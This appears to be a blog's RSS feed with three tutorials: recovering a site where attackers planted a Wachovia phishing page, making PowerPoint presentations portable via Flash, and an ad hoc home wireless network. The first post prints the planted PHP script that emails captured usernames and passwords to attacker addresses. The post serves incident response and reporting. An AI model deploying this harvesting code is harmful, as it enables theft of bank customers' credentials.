Chronosynclastic Infundibulum » tutorial http://www.semanticoverload.com The world through my prisms Thu, 07 Apr 2011 17:36:17 +0000 en-US hourly 1 http://wordpress.org/?v=3.5 If your site has been compromised with phishing attack code… http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/ http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/#comments Tue, 17 Mar 2009 07:30:42 +0000 Semantic Overload http://www.semanticoverload.com/?p=316 I recently recevied the following email:

To whom it may concern:

Please be aware that Wachovia Corporation (“Wachovia”) is the owner of numerous United States and foreign trade marks and services marks used in connection with its financial services and products (the “Wachovia Marks”), including the Wachovia wordmark and Wachovia logo.  Wachovia has expended substantial resources to advertise and promote its products and services under the marks and considers the marks to be valuable assets of Wachovia.

It has come to our attention that your company is hosting a known active phishing site.  The active phishing site displays the Wachovia Marks and is intended to defraud customers in an attempt to capture and use their identity.  Network Whois records indicate the IP address of the phishing site is registered to your Internet space.

Accordingly, we request that your site bring down the Phishing web site at:
<< http://<my website>/home/plugins/editors-xtd/confirm.html >>

So that’s how I knew that my site had been compromised by hackers and a phishing attack code had been injected into my site. If it has happened to you, do you know what is the right thing to do? How do you fix it? Well, here is what I did, and I think it is worthwhile to share this information so that it may be useful to others.. So here goes.

Step 1. Disable Your Site

First, disable your site, bring it down temporarily. The last thing you want is for more people to be scammed by a hacker who compromised your site. You can do that by disabling all access to all the files within your website. If the website is running on unix/linux you can do a “chmod -R 000 <website-home-directory>” (Refer to the chmod tutorial here). For those using cpanel, go to the file manager and change the permissions of the document root for the website.

Step 2. Investigate the Offending Webpage

Now that no more unsuspecting users can be affected by this phishing attack. Now we dig into the offending webpage that is causing the problem. In my case it was: http://<my website>/home/plugins/editors-xtd/confirm.html

I opened up the html file, and this is what I saw:

……

<html xmlns=”http://www.w3.org/1999/xhtml”><head>

<title>Wachovia – Personal Finance and Business Financial Services</title>

……

Clearly, someone was impersonating the Wachovia website. Now, with phishing, someone is trying to steal your username and password by impersonating some crediable website that needs your username and password to get into. In HTML, this is typically accomplished through ‘forms’, which starts with a `<form>’ tag in HTML. So I dug through the code and I saw two form tags.

The first one was:

<form method=”get” action=”http://search.wachovia.com/selfservice/microsites/wachoviaSearchEntry.do?” name=”searchForm” onsubmit=”return verifyQuery(this.searchString);”>

…..

This looks fine because the ‘action’ parameter points to http://search.wachovia.com/selfservice…. which is a search script on the Wachovia website. So anyone filling you this form is sendin their data to the Wachovia website and the hacker will not get any information from it.

Now to the second form tag:

<form method=”post” action=”screen.php” name=”uidAuthForm” id=”uidAuthForm” onsubmit=”return submitLogin(this)”>

……

Aha! The smoking gun! Why? Well, look at the ‘action’ parameter in this ‘form’ tag, it says ‘screen.php’ which is clearly not a script that is on the Wachovia servers, but something that is hosted on my website! So the hackers installed another script on my system to phish the username and passwords. Now I go see what’s inside this ‘screen.php’ file that is located in the same directory as the ‘confirm.html’ file we have been looking at so far.

Step 3. Isolate the script that is doing the actual phishing attack and find the offenders

So I open up the ‘screen.php’ file and this is what I find:

<?php

$ip = getenv(“REMOTE_ADDR”);
$datamasii=date(“D M d, Y g:i a”);
$userid = $HTTP_POST_VARS["userid"];
$password = $HTTP_POST_VARS["password"];
$mesaj = “Hello
userid : $userid
password : $password
——–0WN3d By Louis—————-
IP : $ip
DATE : $datamasii
“;

$recipient = “cashbug5010@gmail.com,smithgreen@hotmail.com”;
$subject = “Take What U need But Make Sure U Cash It Out !!!”;

mail($recipient,$subject,$mesaj);
mail($to,$subject,$mesaj);
header(“Location: http://www.wachovia.com/helpcenter/0,,,00.html”);
?>

So here we are! Gotcha! Check out the line ‘$recipient = “cashbug5010@gmail.com,smithgreen@hotmail.com”;’ Clearly, the phishing attack was being carried out by the following two email addresses: cashbug5010@gmail.com and smithgreen@hotmail.com. Now that I have this much information, what do we do next?

Step 4. Inform the Authorities

We give this information to the authorities who can carry the investigation forward. And who are they? First, respond back to the email address that alerted you of this phishing attack (do a ‘reply all’ if there were multiple recipients/Cc’s to the email you received). Also, copy phishing-report@us-cert.gov and cert@cert.org to this email and just give them a copy of the phishing code (in this case it was the file ‘screen.php’) and the offending email addresses you found.

As for now, that is all you can do, and just co-operate with the authorities if they need more information.

Step 5. Quarantine the Malicious Code and Restore Your Website

Quarantine the files (by disabling their permission to ’000′) and now that the code has been quarantined, you can bring your website up again by setting the permission back to as they were earlier (except for the offending code).

DO NOT DELETE THE MALICIOUS CODE BECAUSE IT IS EVIDENCE AGAINST THE PHISHING ATTACK AND EXONERATES YOU! Otherwise, the authorities may pursue you as an accessory to the crime!

Step 6. Inform Google That Your Site is Safe Again

Now, note that the odds are that Google has already put a notice out against your site as a source of a phishing attack. So go to the following URL http://www.google.com/safebrowsing/report_error/ to let Google know that the problem has been taken care off and you site is safe again.

And that’s all you can do for the moment. Make sure your site is secure and you haven’t given permission to any of your directories to be writable by anyone except you. As for preventing future security breaches, it is always a cat-and-mouse game with hackers and like of you getting smarter and better than the other.

]]>
http://www.semanticoverload.com/2009/03/17/if-your-site-has-been-compromised-with-phishing-attack-code/feed/ 7
Making Your Presentations Portable http://www.semanticoverload.com/2008/04/21/making-your-presentations-portable/ http://www.semanticoverload.com/2008/04/21/making-your-presentations-portable/#comments Mon, 21 Apr 2008 22:32:18 +0000 Semantic Overload http://www.semanticoverload.com/?p=150 I had the following problem(s):

  • I had a fairly large presentation which I had to share among several people for review.
  • Not everyone was running the same version of Powerpoint, and not everyone used Windows.
  • People who wouldn’t be able to make it to my actual presentation wanted to be able to view it (along with the voice narration) later.
  • I wanted it to be accessible and usable by everyone regardless of the OS, the browser, or the presentation software they were using.

I figured this was a pretty common problem that many people face and a documented solution would be nice. More so, since someone I demonstrated this solution to now swears by it and can’t thank me enough. So I figured, why not spread the knowledge :) (Unfortunately, this solution works only if you are using Windows XP/Vista. Sorry, I couldn’t find the right tools to make it work on MAC OS X.)

Here’s the bird’s eye view of my solution:

  1. Prep your presentation to be made ‘complete’ and ‘kiosk-ready’.
  2. Download and install AuthorPoint Lite.
  3. Import the presentation into AuthorPoint Lite, and preserve the rehearse timings, animations, and (optionally) narration.
  4. Convert the presentation to flash using AuthorPoint Lite.
  5. Upload the generated swf file online for the world to see!
  6. The End.

Prepping your presentation

Before you can make a presentation portable, you have got to make sure that the presentation itself has enough information in it to be portable. Also, you have to ensure that the presentation have been configured so that the tools you will use to make it portable can use it to advantage.

So here’s how you would go about the job:

Ensure all information is available

When are making a presentation portable, then, more often than not, the people who will access it will not have the luxury of you walking through the presentation for them. So make sure you have notes for each slide for the presentation to be understandable on its own, even without the speaker present. It often a good idea to include the text of your narration for each slide in the Slide Notes section.

Recording Narration

You also have the choice of recording your narration. You can do this if you would like people to be able to view and hear your presentation online. In order to record your presentation (Assuming you have a workgin microphone to record) you need to do the following:

  • Ensure that you have no automatic animations set. You can do that as follows:
    1. Click on the Slide Show menu and choose Custom Animation.
    2. Click on the first item in the Animation Order box on the Order & Timing tab.
    3. Select the On Mouse Click radio button under Start Animation as shown in the figure below.Unset Custom Animation
  • Test your microphone by opening Slide Show -> Record Narration -> Set Microphone Level button. You’ll see the Microphone Check dialog box pop up. Set the level appropriately as shown below:Testing Microphone
  • You can adjust the sound quality if you like:
    Adjust Sound Quality
  • DO NOT check the ‘Link the Narrations’ checkbox! This option being unchecked is very important for portability!
  • Now start recording you narration and manually click through the slides (and animation) as you narrate into the microphone. You can stop anytime by pressing [Esc]. After you reach the last slide, or after you press [Esc], PowerPoint will ask if you’d like to save the slide timings. Click No. (As shown below):
    Save Slide Timings Dialog
  • Now you can browse through the slides and review your narration by clicking on the sound icon icon. You can delete the narration on each slide and record the narration if necessary.

Rehearsing Timing

Click on the Slide Show menu and choose Rehearse Timings. You’ll immediately be transferred into Slideshow View, and the narration should begin. You’ll see a Rehearsal toolbar appear:

rehearse timing

Advance through the presentation by advancing to the next slide when the narration for each slide is complete. Also make sure that you step through the animation appropriately. When you’ve scrolled through the entire presentation, PowerPoint will again ask if you’d like to save the timings. Click Yes.

Now your presentation is self-contained and complete. However, it is still a .ppt file. To make it portable, you need to convert it to a more portable format. My choice is ShockWave File, or Flash format.

AuthorPoint Lite

AuthorPoint Lite is a free Powerpoint-to-Flash converter. The neat thing about this software is that it can import all the settings from a powerpoint slide including narration, rehearsed timing, custom animation etc. Here is a great review on AuthorPoint Lite.

  • Download and install AuthorPoint Lite
  • Import your presentation into AuthorPoint Lite.
  • Save it as a swf file.

Uploading the swf file

Now upload the saved swf file to your webserver, and provide a link to it on your website. This swf file is your presentation complete with your narration, animation, slide timings, your slide notes, etc. And the best part is that sinceits a swf file, any browser with a flash plugin can play this file! Truly portable!

Enjoy

The End

:)

]]>
http://www.semanticoverload.com/2008/04/21/making-your-presentations-portable/feed/ 5
Home Wireless Network without a router http://www.semanticoverload.com/2007/10/25/home-wireless-network-without-a-router/ http://www.semanticoverload.com/2007/10/25/home-wireless-network-without-a-router/#comments Fri, 26 Oct 2007 00:06:58 +0000 Semantic Overload http://semanticoverload.gaddarinc.com/?p=128 Digg this article.

Ever wondered if you could get a short-range wireless network (for your home) without a wireless router? Well, it is possible. Here’s how:

Things you need

  1. A home computer/laptop with an Ethernet port and wireless card (this computer will then double up as a wireless router).
  2. Internet connection that terminates at your home computer/laptop
  3. Client computers/laptops with wireless cards
  4. Note that the instructions here are for Windows XP, other operating systems will probably have similar ways to accomplish what I am giving you instructions for.

Basic Idea

The basic idea is to set up an ad hoc wireless network among all the computers/laptops so that each one can communicate with the other through the wireless network. Now designate one of the computers as a gateway. The gateway computer is connected to the internet its wired Ethernet connection. Get the gateway to advertise itself as the default internet gateway to all other computer in the ad-hoc network. Now all the computers will start accessing the internet through the gateway computer. Thus the wireless network is established.
Something like this:
Home Wireless Network without a wireless router

Detailed Instructions

  1. Configuring your wireless card on the gateway computer
  2. Your gateway computer is already connected to the internet using a wired connection. We configure the wireless card on the gateway computer as follows:

    • Go to control panel, switch to classic view and click on Network Connections. This should take you to the list of network adapters on your system. Right-click on your wireless network connection and select Properties.
    • Click on Wireless Networks tab in the properties window, and it should look something like this:
    • Wireless Networks tab of wireless card

    • In this tab, click on the Advanced button right next to ‘Learn about setting up a wireless network configuration‘. You should see a window that looks like this:
    • Advaced configuration of wireless networks

    • Click on Computer-to-computer (Ad Hoc) networks only, and then click Close.
    • You should now be back in the Wireless Networks tab of the wireless card properties window. Click on Add button (to add a new ad hoc network). You should see a window that looks something like this:
    • Adding a new ad hoc network

    • Give you ad hoc network the name that you want. I called it ‘Peggy Sue’ in my example. Let the Network Authentication be ‘open‘. You can configure authentication later, if you want. Then, click Ok.
  3. Configuring the Wired connection on the gateway computer
  4. Now you have a ad hoc wireless network, and a connection to the internet. You have to configure them to talk to each other other so that traffic from the ad hoc wireless network can access the internet. You do so by ‘sharing’ the internet connection as follows:

    • Go to control panel, switch to classic view and click on Network Connections. This should take you to the list of network adapters on your system. Right-click on your local area connection and select Properties.
    • Go to the Advanced tab which looks something like this:
    • Advanced properties of the LAN connection

    • Check the box that says ‘Allow other network users to connect through this computer’s internet connection‘. And click Ok.

    Now when you right-click on the wireless network connection and click on view wireless networks, you should see something like this:
    list of wireless networks including Peggy Sue

  5. Connecting other wireless clients to the network
  6. All you now have to do is start up other computers, and connect to the ad hoc wireless network (Peggy Sue) that you just created and you should be good to browse the internet wirelessly!

]]>
http://www.semanticoverload.com/2007/10/25/home-wireless-network-without-a-router/feed/ 7